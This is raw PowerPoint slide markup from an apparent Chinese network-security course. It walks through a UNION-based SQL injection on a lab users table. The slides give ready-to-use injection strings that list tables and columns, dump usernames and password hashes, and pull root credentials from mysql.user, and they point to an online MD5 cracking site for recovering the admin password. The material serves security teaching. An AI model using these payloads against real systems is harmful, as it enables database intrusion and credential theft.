                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="矩形 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3726815" y="5939473"/>
            <a:ext cx="4538980" cy="521970"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>得表名：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>guestbook,users</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="7030A0"/>
              </a:solidFill>
              <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="48136" name="图片 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1493203" y="3347085"/>
            <a:ext cx="9005887" cy="25923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49155"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49156"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49</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="900" dirty="0">
              <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49158" name="矩形 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1906905" y="11113"/>
            <a:ext cx="7559040" cy="1568450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>4.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>猜列名</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>1' union select 1,group_concat(column_name) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>from information_schema.columns </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>where table_name ='users'#</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="矩形 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1485900" y="5179187"/>
            <a:ext cx="8742045" cy="1383665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>得列名：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS" panose="020B0604020202020204" charset="-122"/>
              </a:rPr>
              <a:t>user_id,first_name,last_name,user,password,</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="7030A0"/>
              </a:solidFill>
              <a:latin typeface="Arial Unicode MS" panose="020B0604020202020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS" panose="020B0604020202020204" charset="-122"/>
              </a:rPr>
              <a:t>avatar,last_login,failed_login</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="6000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="7030A0"/>
              </a:solidFill>
              <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="7030A0"/>
              </a:solidFill>
              <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="49160" name="图片 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1485900" y="2381885"/>
            <a:ext cx="9104313" cy="2674938"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1069340" y="1579880"/>
            <a:ext cx="10691495" cy="829945"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SELECT first_name,last_name FROM users WHERE user_id ='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>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5645" y="1633855"/>
            <a:ext cx="10229850" cy="359092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SQL查询语句</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51203"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51204"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50</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="900" dirty="0">
              <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51206" name="矩形 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1914525" y="11113"/>
            <a:ext cx="9423400" cy="1198880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>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猜用户密码</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a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2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1' union select null,concat_ws(char(32,58,32),user,password)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1"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 from users #</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="51207" name="图片 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2062480" y="1738630"/>
            <a:ext cx="5837238" cy="4872038"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8153400" y="4012883"/>
            <a:ext cx="2903220" cy="521970"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>得用户密码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>MD5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>值</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="7030A0"/>
              </a:solidFill>
              <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="972185" y="1210310"/>
            <a:ext cx="10691495" cy="829945"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SELECT first_name,last_name FROM users WHERE user_id ='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>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53251"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53252"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51</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="900" dirty="0">
              <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53253" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1900238" y="765175"/>
            <a:ext cx="3195955" cy="583565"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>6. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>破解用户密码</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53254" name="矩形 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2133600" y="1690688"/>
            <a:ext cx="8118475" cy="1383665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>https://cmd5.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>，对上述</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>MD5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>值进行破解，还原</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>用户密码明文。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="53255" name="图片 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1885950" y="3213100"/>
            <a:ext cx="8602663" cy="287972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1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>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eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
            </a:pPr>
            <a:fld id="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}" type="datetime1">
              <a:rPr lang="zh-CN" altLang="en-US" sz="900" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>2023/11/13</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="900" dirty="0">
              <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54275" name="页脚占位符 2"/>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ctr" eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="900" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>网络安全理论与技术</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="900" dirty="0">
              <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54276" name="灯片编号占位符 3"/>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等线" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0" algn="r" eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
            </a:pPr>
            <a:fld id="{9A0DB2DC-4C9A-4742-B13C-FB6460FD3503}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>52</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="900" dirty="0">
              <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54277" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1900555" y="436245"/>
            <a:ext cx="4262755" cy="583565"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>7. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>猜</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>用户信息</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54278" name="矩形 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1900555" y="1356360"/>
            <a:ext cx="9742170" cy="829945"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>1' union select 1,group_concat(user,password) from mysql.user#</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="54279" name="图片 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5468938" y="5283200"/>
            <a:ext cx="5191125" cy="1438275"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
